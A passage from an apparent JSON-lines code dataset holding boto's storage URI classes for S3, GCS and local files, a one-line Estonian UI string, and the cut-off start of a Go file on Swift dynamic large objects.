_check_bucket_uri(self, function_name):\n if issubclass(type(self), BucketStorageUri) and not self.bucket_name:\n raise InvalidUriError(\n '%s on bucket-less URI (%s)' % (function_name, self.uri))\n\n def _check_object_uri(self, function_name):\n if issubclass(type(self), BucketStorageUri) and not self.object_name:\n raise InvalidUriError('%s on object-less URI (%s)' %\n (function_name, self.uri))\n\n def _warn_about_args(self, function_name, **args):\n for arg in args:\n if args[arg]:\n sys.stderr.write(\n 'Warning: %s ignores argument: %s=%s\\n' %\n (function_name, arg, str(args[arg])))\n\n def connect(self, access_key_id=None, secret_access_key=None, **kwargs):\n \"\"\"\n Opens a connection to appropriate provider, depending on provider\n portion of URI. Requires Credentials defined in boto config file (see\n boto/pyami/config.py).\n @type storage_uri: StorageUri\n @param storage_uri: StorageUri specifying a bucket or a bucket+object\n @rtype: L{AWSAuthConnection}\n @return: A connection to storage service provider of the given URI.\n \"\"\"\n connection_args = dict(self.connection_args or ())\n\n if (hasattr(self, 'suppress_consec_slashes') and\n 'suppress_consec_slashes' not in connection_args):\n connection_args['suppress_consec_slashes'] = (\n self.suppress_consec_slashes)\n connection_args.update(kwargs)\n if not self.connection:\n if self.scheme in self.provider_pool:\n self.connection = self.provider_pool[self.scheme]\n elif self.scheme == 's3':\n from boto.s3.connection import S3Connection\n self.connection = S3Connection(access_key_id,\n secret_access_key,\n **connection_args)\n self.provider_pool[self.scheme] = self.connection\n elif self.scheme == 'gs':\n from boto.gs.connection import GSConnection\n # Use OrdinaryCallingFormat instead of boto-default\n # SubdomainCallingFormat because the latter changes the hostname\n # that's checked during cert validation for HTTPS connections,\n # which will fail cert validation (when cert validation is\n # enabled).\n #\n # The same is not true for S3's HTTPS certificates. In fact,\n # we don't want to do this for S3 because S3 requires the\n # subdomain to match the location of the bucket. 
If the proper\n # subdomain is not used, the server will return a 301 redirect\n # with no Location header.\n #\n # Note: the following import can't be moved up to the\n # start of this file else it causes a config import failure when\n # run from the resumable upload/download tests.\n from boto.s3.connection import OrdinaryCallingFormat\n connection_args['calling_format'] = OrdinaryCallingFormat()\n self.connection = GSConnection(access_key_id,\n secret_access_key,\n **connection_args)\n self.provider_pool[self.scheme] = self.connection\n elif self.scheme == 'file':\n from boto.file.connection import FileConnection\n self.connection = FileConnection(self)\n else:\n raise InvalidUriError('Unrecognized scheme \"%s\"' %\n self.scheme)\n self.connection.debug = self.debug\n return self.connection\n\n def has_version(self):\n return (issubclass(type(self), BucketStorageUri)\n and ((self.version_id is not None)\n or (self.generation is not None)))\n\n def delete_key(self, validate=False, headers=None, version_id=None,\n mfa_token=None):\n self._check_object_uri('delete_key')\n bucket = self.get_bucket(validate, headers)\n return bucket.delete_key(self.object_name, headers, version_id,\n mfa_token)\n\n def list_bucket(self, prefix='', delimiter='', headers=None,\n all_versions=False):\n self._check_bucket_uri('list_bucket')\n bucket = self.get_bucket(headers=headers)\n if all_versions:\n return (v for v in bucket.list_versions(\n prefix=prefix, delimiter=delimiter, headers=headers)\n if not isinstance(v, DeleteMarker))\n else:\n return bucket.list(prefix=prefix, delimiter=delimiter,\n headers=headers)\n\n def get_all_keys(self, validate=False, headers=None, prefix=None):\n bucket = self.get_bucket(validate, headers)\n return bucket.get_all_keys(headers)\n\n def get_bucket(self, validate=False, headers=None):\n self._check_bucket_uri('get_bucket')\n conn = self.connect()\n bucket = conn.get_bucket(self.bucket_name, validate, headers)\n self.check_response(bucket, 'bucket', self.uri)\n return bucket\n\n def get_key(self, validate=False, headers=None, version_id=None):\n self._check_object_uri('get_key')\n bucket = self.get_bucket(validate, headers)\n key = bucket.get_key(self.object_name, headers, version_id)\n self.check_response(key, 'key', self.uri)\n return key\n\n def new_key(self, validate=False, headers=None):\n self._check_object_uri('new_key')\n bucket = self.get_bucket(validate, headers)\n return bucket.new_key(self.object_name)\n\n def get_contents_to_stream(self, fp, headers=None, version_id=None):\n self._check_object_uri('get_key')\n self._warn_about_args('get_key', validate=False)\n key = self.get_key(None, headers)\n self.check_response(key, 'key', self.uri)\n return key.get_contents_to_file(fp, headers, version_id=version_id)\n\n def get_contents_to_file(self, fp, headers=None, cb=None, num_cb=10,\n torrent=False, version_id=None,\n res_download_handler=None, response_headers=None,\n hash_algs=None):\n self._check_object_uri('get_contents_to_file')\n key = self.get_key(None, headers)\n self.check_response(key, 'key', self.uri)\n if hash_algs:\n key.get_contents_to_file(fp, headers, cb, num_cb, torrent,\n version_id, res_download_handler,\n response_headers,\n hash_algs=hash_algs)\n else:\n key.get_contents_to_file(fp, headers, cb, num_cb, torrent,\n version_id, res_download_handler,\n response_headers)\n\n def get_contents_as_string(self, validate=False, headers=None, cb=None,\n num_cb=10, torrent=False, version_id=None):\n self._check_object_uri('get_contents_as_string')\n key = 
self.get_key(validate, headers)\n self.check_response(key, 'key', self.uri)\n return key.get_contents_as_string(headers, cb, num_cb, torrent,\n version_id)\n\n def acl_class(self):\n conn = self.connect()\n acl_class = conn.provider.acl_class\n self.check_response(acl_class, 'acl_class', self.uri)\n return acl_class\n\n def canned_acls(self):\n conn = self.connect()\n canned_acls = conn.provider.canned_acls\n self.check_response(canned_acls, 'canned_acls', self.uri)\n return canned_acls\n\n\nclass BucketStorageUri(StorageUri):\n \"\"\"\n StorageUri subclass that handles bucket storage providers.\n Callers should instantiate this class by calling boto.storage_uri().\n \"\"\"\n\n delim = '/'\n capabilities = set([]) # A set of additional capabilities.\n\n def __init__(self, scheme, bucket_name=None, object_name=None,\n debug=0, connection_args=None, suppress_consec_slashes=True,\n version_id=None, generation=None, is_latest=False):\n \"\"\"Instantiate a BucketStorageUri from scheme,bucket,object tuple.\n\n @type scheme: string\n @param scheme: URI scheme naming the storage provider (gs, s3, etc.)\n @type bucket_name: string\n @param bucket_name: bucket name\n @type object_name: string\n @param object_name: object name, excluding generation/version.\n @type debug: int\n @param debug: debug level to pass in to connection (range 0..2)\n @type connection_args: map\n @param connection_args: optional map containing args to be\n passed to {S3,GS}Connection constructor (e.g., to override\n https_connection_factory).\n @param suppress_consec_slashes: If provided, controls whether\n consecutive slashes will be suppressed in key paths.\n @param version_id: Object version id (S3-specific).\n @param generation: Object generation number (GCS-specific).\n @param is_latest: boolean indicating that a versioned object is the\n current version\n\n After instantiation the components are available in the following\n fields: scheme, bucket_name, object_name, version_id, generation,\n is_latest, versionless_uri, version_specific_uri, uri.\n Note: If instantiated without version info, the string representation\n for a URI stays versionless; similarly, if instantiated with version\n info, the string representation for a URI stays version-specific. 
If you\n call one of the uri.set_contents_from_xyz() methods, a specific object\n version will be created, and its version-specific URI string can be\n retrieved from version_specific_uri even if the URI was instantiated\n without version info.\n \"\"\"\n\n self.scheme = scheme\n self.bucket_name = bucket_name\n self.object_name = object_name\n self.debug = debug\n if connection_args:\n self.connection_args = connection_args\n self.suppress_consec_slashes = suppress_consec_slashes\n self.version_id = version_id\n self.generation = generation and int(generation)\n self.is_latest = is_latest\n self.is_version_specific = bool(self.generation) or bool(version_id)\n self._build_uri_strings()\n\n def _build_uri_strings(self):\n if self.bucket_name and self.object_name:\n self.versionless_uri = '%s://%s/%s' % (self.scheme, self.bucket_name,\n self.object_name)\n if self.generation:\n self.version_specific_uri = '%s#%s' % (self.versionless_uri,\n self.generation)\n elif self.version_id:\n self.version_specific_uri = '%s#%s' % (\n self.versionless_uri, self.version_id)\n if self.is_version_specific:\n self.uri = self.version_specific_uri\n else:\n self.uri = self.versionless_uri\n elif self.bucket_name:\n self.uri = ('%s://%s/' % (self.scheme, self.bucket_name))\n else:\n self.uri = ('%s://' % self.scheme)\n\n def _update_from_key(self, key):\n self._update_from_values(\n getattr(key, 'version_id', None),\n getattr(key, 'generation', None),\n getattr(key, 'is_latest', None),\n getattr(key, 'md5', None))\n\n def _update_from_values(self, version_id, generation, is_latest, md5):\n self.version_id = version_id\n self.generation = generation\n self.is_latest = is_latest\n self._build_uri_strings()\n self.md5 = md5\n\n def get_key(self, validate=False, headers=None, version_id=None):\n self._check_object_uri('get_key')\n bucket = self.get_bucket(validate, headers)\n if self.get_provider().name == 'aws':\n key = bucket.get_key(self.object_name, headers,\n version_id=(version_id or self.version_id))\n elif self.get_provider().name == 'google':\n key = bucket.get_key(self.object_name, headers,\n generation=self.generation)\n self.check_response(key, 'key', self.uri)\n return key\n\n def delete_key(self, validate=False, headers=None, version_id=None,\n mfa_token=None):\n self._check_object_uri('delete_key')\n bucket = self.get_bucket(validate, headers)\n if self.get_provider().name == 'aws':\n version_id = version_id or self.version_id\n return bucket.delete_key(self.object_name, headers, version_id,\n mfa_token)\n elif self.get_provider().name == 'google':\n return bucket.delete_key(self.object_name, headers,\n generation=self.generation)\n\n def clone_replace_name(self, new_name):\n \"\"\"Instantiate a BucketStorageUri from the current BucketStorageUri,\n but replacing the object_name.\n\n @type new_name: string\n @param new_name: new object name\n \"\"\"\n self._check_bucket_uri('clone_replace_name')\n return BucketStorageUri(\n self.scheme, bucket_name=self.bucket_name, object_name=new_name,\n debug=self.debug,\n suppress_consec_slashes=self.suppress_consec_slashes)\n\n def clone_replace_key(self, key):\n \"\"\"Instantiate a BucketStorageUri from the current BucketStorageUri, by\n replacing the object name with the object name and other metadata found\n in the given Key object (including generation).\n\n @type key: Key\n @param key: key for the new StorageUri to represent\n \"\"\"\n self._check_bucket_uri('clone_replace_key')\n version_id = None\n generation = None\n is_latest = False\n if hasattr(key, 
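Because _build_uri_strings() derives the versionless and version-specific string forms purely from the constructor arguments, this behaviour can be shown without any connection. A small sketch, assuming only that boto is importable; the bucket and object names are made up.

```python
from boto.storage_uri import BucketStorageUri

# Versionless URI: no version_id/generation supplied.
plain = BucketStorageUri('gs', bucket_name='example-bucket', object_name='notes.txt')
print(plain.uri)                  # gs://example-bucket/notes.txt
print(plain.is_version_specific)  # False

# Generation-qualified URI (GCS-style): uri switches to the version-specific form.
versioned = BucketStorageUri('gs', bucket_name='example-bucket',
                             object_name='notes.txt', generation=3)
print(versioned.versionless_uri)       # gs://example-bucket/notes.txt
print(versioned.version_specific_uri)  # gs://example-bucket/notes.txt#3
print(versioned.uri)                   # gs://example-bucket/notes.txt#3

# clone_replace_name() keeps the scheme and bucket but swaps the object name.
renamed = plain.clone_replace_name('archive/notes-old.txt')
print(renamed.uri)                     # gs://example-bucket/archive/notes-old.txt
```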
'version_id'):\n version_id = key.version_id\n if hasattr(key, 'generation'):\n generation = key.generation\n if hasattr(key, 'is_latest'):\n is_latest = key.is_latest\n\n return BucketStorageUri(\n key.provider.get_provider_name(),\n bucket_name=key.bucket.name,\n object_name=key.name,\n debug=self.debug,\n suppress_consec_slashes=self.suppress_consec_slashes,\n version_id=version_id,\n generation=generation,\n is_latest=is_latest)\n\n def get_acl(self, validate=False, headers=None, version_id=None):\n \"\"\"returns a bucket's acl\"\"\"\n self._check_bucket_uri('get_acl')\n bucket = self.get_bucket(validate, headers)\n # This works for both bucket- and object- level ACLs (former passes\n # key_name=None):\n key_name = self.object_name or ''\n if self.get_provider().name == 'aws':\n version_id = version_id or self.version_id\n acl = bucket.get_acl(key_name, headers, version_id)\n else:\n acl = bucket.get_acl(key_name, headers, generation=self.generation)\n self.check_response(acl, 'acl', self.uri)\n return acl\n\n def get_def_acl(self, validate=False, headers=None):\n \"\"\"returns a bucket's default object acl\"\"\"\n self._check_bucket_uri('get_def_acl')\n bucket = self.get_bucket(validate, headers)\n acl = bucket.get_def_acl(headers)\n self.check_response(acl, 'acl', self.uri)\n return acl\n\n def get_cors(self, validate=False, headers=None):\n \"\"\"returns a bucket's CORS XML\"\"\"\n self._check_bucket_uri('get_cors')\n bucket = self.get_bucket(validate, headers)\n cors = bucket.get_cors(headers)\n self.check_response(cors, 'cors', self.uri)\n return cors\n\n def set_cors(self, cors, validate=False, headers=None):\n \"\"\"sets or updates a bucket's CORS XML\"\"\"\n self._check_bucket_uri('set_cors ')\n bucket = self.get_bucket(validate, headers)\n if self.scheme == 's3':\n bucket.set_cors(cors, headers)\n else:\n bucket.set_cors(cors.to_xml(), headers)\n\n def get_location(self, validate=False, headers=None):\n self._check_bucket_uri('get_location')\n bucket = self.get_bucket(validate, headers)\n return bucket.get_location()\n\n def get_storage_class(self, validate=False, headers=None):\n self._check_bucket_uri('get_storage_class')\n # StorageClass is defined as a bucket and object param for GCS, but\n # only as a key param for S3.\n if self.scheme != 'gs':\n raise ValueError('get_storage_class() not supported for %s '\n 'URIs.' % self.scheme)\n bucket = self.get_bucket(validate, headers)\n return bucket.get_storage_class()\n\n def set_storage_class(self, storage_class, validate=False, headers=None):\n \"\"\"Updates a bucket's storage class.\"\"\"\n self._check_bucket_uri('set_storage_class')\n # StorageClass is defined as a bucket and object param for GCS, but\n # only as a key param for S3.\n if self.scheme != 'gs':\n raise ValueError('set_storage_class() not supported for %s '\n 'URIs.' % self.scheme)\n bucket = self.get_bucket(validate, headers)\n bucket.set_storage_class(storage_class, headers)\n\n def get_subresource(self, subresource, validate=False, headers=None,\n version_id=None):\n self._check_bucket_uri('get_subresource')\n bucket = self.get_bucket(validate, headers)\n return bucket.get_subresource(subresource, self.object_name, headers,\n version_id)\n\n def add_group_email_grant(self, permission, email_address, recursive=False,\n validate=False, headers=None):\n self._check_bucket_uri('add_group_email_grant')\n if self.scheme != 'gs':\n raise ValueError('add_group_email_grant() not supported for %s '\n 'URIs.' 
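The get_acl()/get_def_acl()/get_cors() accessors above all resolve the bucket first and then delegate to it. A hedged sketch of reading these resources; it assumes a reachable bucket, configured credentials, and placeholder names.

```python
import boto

bucket_uri = boto.storage_uri('gs://example-bucket')

# Bucket-level ACL (an object URI would return the object-level ACL instead).
acl = bucket_uri.get_acl()
print(acl.to_xml())

# Default object ACL and CORS configuration are bucket-only resources.
def_acl = bucket_uri.get_def_acl()
cors = bucket_uri.get_cors()
print(cors.to_xml())
```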
% self.scheme)\n if self.object_name:\n if recursive:\n raise ValueError('add_group_email_grant() on key-ful URI cannot '\n 'specify recursive=True')\n key = self.get_key(validate, headers)\n self.check_response(key, 'key', self.uri)\n key.add_group_email_grant(permission, email_address, headers)\n elif self.bucket_name:\n bucket = self.get_bucket(validate, headers)\n bucket.add_group_email_grant(permission, email_address, recursive,\n headers)\n else:\n raise InvalidUriError('add_group_email_grant() on bucket-less URI '\n '%s' % self.uri)\n\n def add_email_grant(self, permission, email_address, recursive=False,\n validate=False, headers=None):\n self._check_bucket_uri('add_email_grant')\n if not self.object_name:\n bucket = self.get_bucket(validate, headers)\n bucket.add_email_grant(permission, email_address, recursive,\n headers)\n else:\n key = self.get_key(validate, headers)\n self.check_response(key, 'key', self.uri)\n key.add_email_grant(permission, email_address)\n\n def add_user_grant(self, permission, user_id, recursive=False,\n validate=False, headers=None):\n self._check_bucket_uri('add_user_grant')\n if not self.object_name:\n bucket = self.get_bucket(validate, headers)\n bucket.add_user_grant(permission, user_id, recursive, headers)\n else:\n key = self.get_key(validate, headers)\n self.check_response(key, 'key', self.uri)\n key.add_user_grant(permission, user_id)\n\n def list_grants(self, headers=None):\n self._check_bucket_uri('list_grants ')\n bucket = self.get_bucket(headers)\n return bucket.list_grants(headers)\n\n def is_file_uri(self):\n \"\"\"Returns True if this URI names a file or directory.\"\"\"\n return False\n\n def is_cloud_uri(self):\n \"\"\"Returns True if this URI names a bucket or object.\"\"\"\n return True\n\n def names_container(self):\n \"\"\"\n Returns True if this URI names a directory or bucket. Will return\n False for bucket subdirs; providing bucket subdir semantics needs to\n be done by the caller (like gsutil does).\n \"\"\"\n return bool(not self.object_name)\n\n def names_singleton(self):\n \"\"\"Returns True if this URI names a file or object.\"\"\"\n return bool(self.object_name)\n\n def names_directory(self):\n \"\"\"Returns True if this URI names a directory.\"\"\"\n return False\n\n def names_provider(self):\n \"\"\"Returns True if this URI names a provider.\"\"\"\n return bool(not self.bucket_name)\n\n def names_bucket(self):\n \"\"\"Returns True if this URI names a bucket.\"\"\"\n return bool(self.bucket_name) and bool(not self.object_name)\n\n def names_file(self):\n \"\"\"Returns True if this URI names a file.\"\"\"\n return False\n\n def names_object(self):\n \"\"\"Returns True if this URI names an object.\"\"\"\n return self.names_singleton()\n\n def is_stream(self):\n \"\"\"Returns True if this URI represents input/output stream.\"\"\"\n return False\n\n def create_bucket(self, headers=None, location='', policy=None,\n storage_class=None):\n self._check_bucket_uri('create_bucket ')\n conn = self.connect()\n # Pass storage_class param only if this is a GCS bucket. 
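The names_*() predicates above only inspect which URI components are present, so they can be demonstrated offline. A sketch with made-up names, assuming only that boto is importable.

```python
from boto.storage_uri import BucketStorageUri

provider_only = BucketStorageUri('gs')
bucket_only = BucketStorageUri('gs', bucket_name='example-bucket')
full_object = BucketStorageUri('gs', bucket_name='example-bucket',
                               object_name='img/logo.png')

print(provider_only.names_provider(), provider_only.names_bucket())  # True False
print(bucket_only.names_bucket(), bucket_only.names_container())     # True True
print(full_object.names_object(), full_object.names_singleton())     # True True
print(full_object.is_cloud_uri(), full_object.is_file_uri())         # True False
```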
(In S3 the\n # storage class is specified on the key object.)\n if self.scheme == 'gs':\n return conn.create_bucket(self.bucket_name, headers, location, policy,\n storage_class)\n else:\n return conn.create_bucket(self.bucket_name, headers, location, policy)\n\n def delete_bucket(self, headers=None):\n self._check_bucket_uri('delete_bucket')\n conn = self.connect()\n return conn.delete_bucket(self.bucket_name, headers)\n\n def get_all_buckets(self, headers=None):\n conn = self.connect()\n return conn.get_all_buckets(headers)\n\n def get_provider(self):\n conn = self.connect()\n provider = conn.provider\n self.check_response(provider, 'provider', self.uri)\n return provider\n\n def set_acl(self, acl_or_str, key_name='', validate=False, headers=None,\n version_id=None, if_generation=None, if_metageneration=None):\n \"\"\"Sets or updates a bucket's ACL.\"\"\"\n self._check_bucket_uri('set_acl')\n key_name = key_name or self.object_name or ''\n bucket = self.get_bucket(validate, headers)\n if self.generation:\n bucket.set_acl(\n acl_or_str, key_name, headers, generation=self.generation,\n if_generation=if_generation, if_metageneration=if_metageneration)\n else:\n version_id = version_id or self.version_id\n bucket.set_acl(acl_or_str, key_name, headers, version_id)\n\n def set_xml_acl(self, xmlstring, key_name='', validate=False, headers=None,\n version_id=None, if_generation=None, if_metageneration=None):\n \"\"\"Sets or updates a bucket's ACL with an XML string.\"\"\"\n self._check_bucket_uri('set_xml_acl')\n key_name = key_name or self.object_name or ''\n bucket = self.get_bucket(validate, headers)\n if self.generation:\n bucket.set_xml_acl(\n xmlstring, key_name, headers, generation=self.generation,\n if_generation=if_generation, if_metageneration=if_metageneration)\n else:\n version_id = version_id or self.version_id\n bucket.set_xml_acl(xmlstring, key_name, headers,\n version_id=version_id)\n\n def set_def_xml_acl(self, xmlstring, validate=False, headers=None):\n \"\"\"Sets or updates a bucket's default object ACL with an XML string.\"\"\"\n self._check_bucket_uri('set_def_xml_acl')\n self.get_bucket(validate, headers).set_def_xml_acl(xmlstring, headers)\n\n def set_def_acl(self, acl_or_str, validate=False, headers=None,\n version_id=None):\n \"\"\"Sets or updates a bucket's default object ACL.\"\"\"\n self._check_bucket_uri('set_def_acl')\n self.get_bucket(validate, headers).set_def_acl(acl_or_str, headers)\n\n def set_canned_acl(self, acl_str, validate=False, headers=None,\n version_id=None):\n \"\"\"Sets or updates a bucket's acl to a predefined (canned) value.\"\"\"\n self._check_object_uri('set_canned_acl')\n self._warn_about_args('set_canned_acl', version_id=version_id)\n key = self.get_key(validate, headers)\n self.check_response(key, 'key', self.uri)\n key.set_canned_acl(acl_str, headers)\n\n def set_def_canned_acl(self, acl_str, validate=False, headers=None,\n version_id=None):\n \"\"\"Sets or updates a bucket's default object acl to a predefined\n (canned) value.\"\"\"\n self._check_bucket_uri('set_def_canned_acl ')\n key = self.get_key(validate, headers)\n self.check_response(key, 'key', self.uri)\n key.set_def_canned_acl(acl_str, headers, version_id)\n\n def set_subresource(self, subresource, value, validate=False, headers=None,\n version_id=None):\n self._check_bucket_uri('set_subresource')\n bucket = self.get_bucket(validate, headers)\n bucket.set_subresource(subresource, value, self.object_name, headers,\n version_id)\n\n def set_contents_from_string(self, s, headers=None, 
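create_bucket() above forwards storage_class only for 'gs' URIs (for S3 the storage class lives on the key), and set_canned_acl() applies a predefined ACL through the key an object URI resolves to. A hedged sketch under assumed credentials; the bucket name, object name, and 'NEARLINE' storage class are illustrative placeholders.

```python
import boto

# Bucket creation: storage_class is honoured for gs:// URIs only.
bucket_uri = boto.storage_uri('gs://example-new-bucket')
bucket_uri.create_bucket(location='US', storage_class='NEARLINE')

# Canned ACLs go through the object's key; the object must exist first.
obj_uri = boto.storage_uri('gs://example-new-bucket/public/readme.txt')
obj_uri.set_contents_from_string('hello')
obj_uri.set_canned_acl('public-read')
```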
replace=True,\n cb=None, num_cb=10, policy=None, md5=None,\n reduced_redundancy=False):\n self._check_object_uri('set_contents_from_string')\n key = self.new_key(headers=headers)\n if self.scheme == 'gs':\n if reduced_redundancy:\n sys.stderr.write('Warning: GCS does not support '\n 'reduced_redundancy; argument ignored by '\n 'set_contents_from_string')\n result = key.set_contents_from_string(\n s, headers, replace, cb, num_cb, policy, md5)\n else:\n result = key.set_contents_from_string(\n s, headers, replace, cb, num_cb, policy, md5,\n reduced_redundancy)\n self._update_from_key(key)\n return result\n\n def set_contents_from_file(self, fp, headers=None, replace=True, cb=None,\n num_cb=10, policy=None, md5=None, size=None,\n rewind=False, res_upload_handler=None):\n self._check_object_uri('set_contents_from_file')\n key = self.new_key(headers=headers)\n if self.scheme == 'gs':\n result = key.set_contents_from_file(\n fp, headers, replace, cb, num_cb, policy, md5, size=size,\n rewind=rewind, res_upload_handler=res_upload_handler)\n if res_upload_handler:\n self._update_from_values(None, res_upload_handler.generation,\n None, md5)\n else:\n self._warn_about_args('set_contents_from_file',\n res_upload_handler=res_upload_handler)\n result = key.set_contents_from_file(\n fp, headers, replace, cb, num_cb, policy, md5, size=size,\n rewind=rewind)\n self._update_from_key(key)\n return result\n\n def set_contents_from_stream(self, fp, headers=None, replace=True, cb=None,\n policy=None, reduced_redundancy=False):\n self._check_object_uri('set_contents_from_stream')\n dst_key = self.new_key(False, headers)\n result = dst_key.set_contents_from_stream(\n fp, headers, replace, cb, policy=policy,\n reduced_redundancy=reduced_redundancy)\n self._update_from_key(dst_key)\n return result\n\n def copy_key(self, src_bucket_name, src_key_name, metadata=None,\n src_version_id=None, storage_class='STANDARD',\n preserve_acl=False, encrypt_key=False, headers=None,\n query_args=None, src_generation=None):\n \"\"\"Returns newly created key.\"\"\"\n self._check_object_uri('copy_key')\n dst_bucket = self.get_bucket(validate=False, headers=headers)\n if src_generation:\n return dst_bucket.copy_key(\n new_key_name=self.object_name,\n src_bucket_name=src_bucket_name,\n src_key_name=src_key_name, metadata=metadata,\n storage_class=storage_class, preserve_acl=preserve_acl,\n encrypt_key=encrypt_key, headers=headers, query_args=query_args,\n src_generation=src_generation)\n else:\n return dst_bucket.copy_key(\n new_key_name=self.object_name,\n src_bucket_name=src_bucket_name, src_key_name=src_key_name,\n metadata=metadata, src_version_id=src_version_id,\n storage_class=storage_class, preserve_acl=preserve_acl,\n encrypt_key=encrypt_key, headers=headers, query_args=query_args)\n\n def enable_logging(self, target_bucket, target_prefix=None, validate=False,\n headers=None, version_id=None):\n self._check_bucket_uri('enable_logging')\n bucket = self.get_bucket(validate, headers)\n bucket.enable_logging(target_bucket, target_prefix, headers=headers)\n\n def disable_logging(self, validate=False, headers=None, version_id=None):\n self._check_bucket_uri('disable_logging')\n bucket = self.get_bucket(validate, headers)\n bucket.disable_logging(headers=headers)\n\n def get_logging_config(self, validate=False, headers=None, version_id=None):\n self._check_bucket_uri('get_logging_config')\n bucket = self.get_bucket(validate, headers)\n return bucket.get_logging_config(headers=headers)\n\n def set_website_config(self, 
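The set_contents_from_* writers above call _update_from_key() so the URI remembers the version/generation of the object it just wrote. A hedged write/read/copy sketch; bucket and object names are placeholders and credentials in the boto config are assumed.

```python
import boto

src = boto.storage_uri('gs://example-bucket/reports/2020-07.csv')
src.set_contents_from_string('date,total\n2020-07-31,42\n')

# After the write, the URI carries the generation reported by the server.
print(src.generation, src.uri)

# Read the object back through the same URI.
print(src.get_contents_as_string())

# Server-side copy to another object name in the same bucket.
dst = boto.storage_uri('gs://example-bucket/reports/latest.csv')
dst.copy_key(src_bucket_name=src.bucket_name, src_key_name=src.object_name)
```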
main_page_suffix=None, error_key=None,\n validate=False, headers=None):\n self._check_bucket_uri('set_website_config')\n bucket = self.get_bucket(validate, headers)\n if not (main_page_suffix or error_key):\n bucket.delete_website_configuration(headers)\n else:\n bucket.configure_website(main_page_suffix, error_key, headers)\n\n def get_website_config(self, validate=False, headers=None):\n self._check_bucket_uri('get_website_config')\n bucket = self.get_bucket(validate, headers)\n return bucket.get_website_configuration(headers)\n\n def get_versioning_config(self, headers=None):\n self._check_bucket_uri('get_versioning_config')\n bucket = self.get_bucket(False, headers)\n return bucket.get_versioning_status(headers)\n\n def configure_versioning(self, enabled, headers=None):\n self._check_bucket_uri('configure_versioning')\n bucket = self.get_bucket(False, headers)\n return bucket.configure_versioning(enabled, headers)\n\n def set_metadata(self, metadata_plus, metadata_minus, preserve_acl,\n headers=None):\n return self.get_key(False).set_remote_metadata(metadata_plus,\n metadata_minus,\n preserve_acl,\n headers=headers)\n\n def compose(self, components, content_type=None, headers=None):\n self._check_object_uri('compose')\n component_keys = []\n for suri in components:\n component_keys.append(suri.new_key())\n component_keys[-1].generation = suri.generation\n self.generation = self.new_key().compose(\n component_keys, content_type=content_type, headers=headers)\n self._build_uri_strings()\n return self\n\n def get_lifecycle_config(self, validate=False, headers=None):\n \"\"\"Returns a bucket's lifecycle configuration.\"\"\"\n self._check_bucket_uri('get_lifecycle_config')\n bucket = self.get_bucket(validate, headers)\n lifecycle_config = bucket.get_lifecycle_config(headers)\n self.check_response(lifecycle_config, 'lifecycle', self.uri)\n return lifecycle_config\n\n def configure_lifecycle(self, lifecycle_config, validate=False,\n headers=None):\n \"\"\"Sets or updates a bucket's lifecycle configuration.\"\"\"\n self._check_bucket_uri('configure_lifecycle')\n bucket = self.get_bucket(validate, headers)\n bucket.configure_lifecycle(lifecycle_config, headers)\n\n def exists(self, headers=None):\n \"\"\"Returns True if the object exists or False if it doesn't\"\"\"\n if not self.object_name:\n raise InvalidUriError('exists on object-less URI (%s)' % self.uri)\n bucket = self.get_bucket()\n key = bucket.get_key(self.object_name, headers=headers)\n return bool(key)\n\n\nclass FileStorageUri(StorageUri):\n \"\"\"\n StorageUri subclass that handles files in the local file system.\n Callers should instantiate this class by calling boto.storage_uri().\n\n See file/README about how we map StorageUri operations onto a file system.\n \"\"\"\n\n delim = os.sep\n\n def __init__(self, object_name, debug, is_stream=False):\n \"\"\"Instantiate a FileStorageUri from a path name.\n\n @type object_name: string\n @param object_name: object name\n @type debug: boolean\n @param debug: whether to enable debugging on this StorageUri\n\n After instantiation the components are available in the following\n fields: uri, scheme, bucket_name (always blank for this \"anonymous\"\n bucket), object_name.\n \"\"\"\n\n self.scheme = 'file'\n self.bucket_name = ''\n self.object_name = object_name\n self.uri = 'file://' + object_name\n self.debug = debug\n self.stream = is_stream\n\n def clone_replace_name(self, new_name):\n \"\"\"Instantiate a FileStorageUri from the current FileStorageUri,\n but replacing the object_name.\n\n 
@type new_name: string\n @param new_name: new object name\n \"\"\"\n return FileStorageUri(new_name, self.debug, self.stream)\n\n def is_file_uri(self):\n \"\"\"Returns True if this URI names a file or directory.\"\"\"\n return True\n\n def is_cloud_uri(self):\n \"\"\"Returns True if this URI names a bucket or object.\"\"\"\n return False\n\n def names_container(self):\n \"\"\"Returns True if this URI names a directory or bucket.\"\"\"\n return self.names_directory()\n\n def names_singleton(self):\n \"\"\"Returns True if this URI names a file (or stream) or object.\"\"\"\n return not self.names_container()\n\n def names_directory(self):\n \"\"\"Returns True if this URI names a directory.\"\"\"\n if self.stream:\n return False\n return os.path.isdir(self.object_name)\n\n def names_provider(self):\n \"\"\"Returns True if this URI names a provider.\"\"\"\n return False\n\n def names_bucket(self):\n \"\"\"Returns True if this URI names a bucket.\"\"\"\n return False\n\n def names_file(self):\n \"\"\"Returns True if this URI names a file.\"\"\"\n return self.names_singleton()\n\n def names_object(self):\n \"\"\"Returns True if this URI names an object.\"\"\"\n return False\n\n def is_stream(self):\n \"\"\"Returns True if this URI represents input/output stream.\n \"\"\"\n return bool(self.stream)\n\n def close(self):\n \"\"\"Closes the underlying file.\n \"\"\"\n self.get_key().close()\n\n def exists(self, _headers_not_used=None):\n \"\"\"Returns True if the file exists or False if it doesn't\"\"\"\n # The _headers_not_used parameter is ignored. It is only there to ensure\n # that this method's signature is identical to the exists method on the\n # BucketStorageUri class.\n return os.path.exists(self.object_name)\n"} {"text": "\n\n Kasuta audio CD radasid\n\n"} {"text": "package swift\n\nimport (\n\t\"os\"\n)\n\n// DynamicLargeObjectCreateFile represents an open static large object\ntype DynamicLargeObjectCreateFile struct {\n\tlargeObjectCreateFile\n}\n\n// DynamicLargeObjectCreateFile creates a dynamic large object\n// returning an object which satisfies io.Writer, io.Seeker, io.Closer\n// and io.ReaderFrom. The flags are as passes to the\n// largeObjectCreate method.\nfunc (c *Connection) DynamicLargeObjectCreateFile(opts *LargeObjectOpts) (LargeObjectFile, error) {\n\tlo, err := c.largeObjectCreate(opts)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn withBuffer(opts, &DynamicLargeObjectCreateFile{\n\t\tlargeObjectCreateFile: *lo,\n\t}), nil\n}\n\n// DynamicLargeObjectCreate creates or truncates an existing dynamic\n// large object returning a writeable object. 
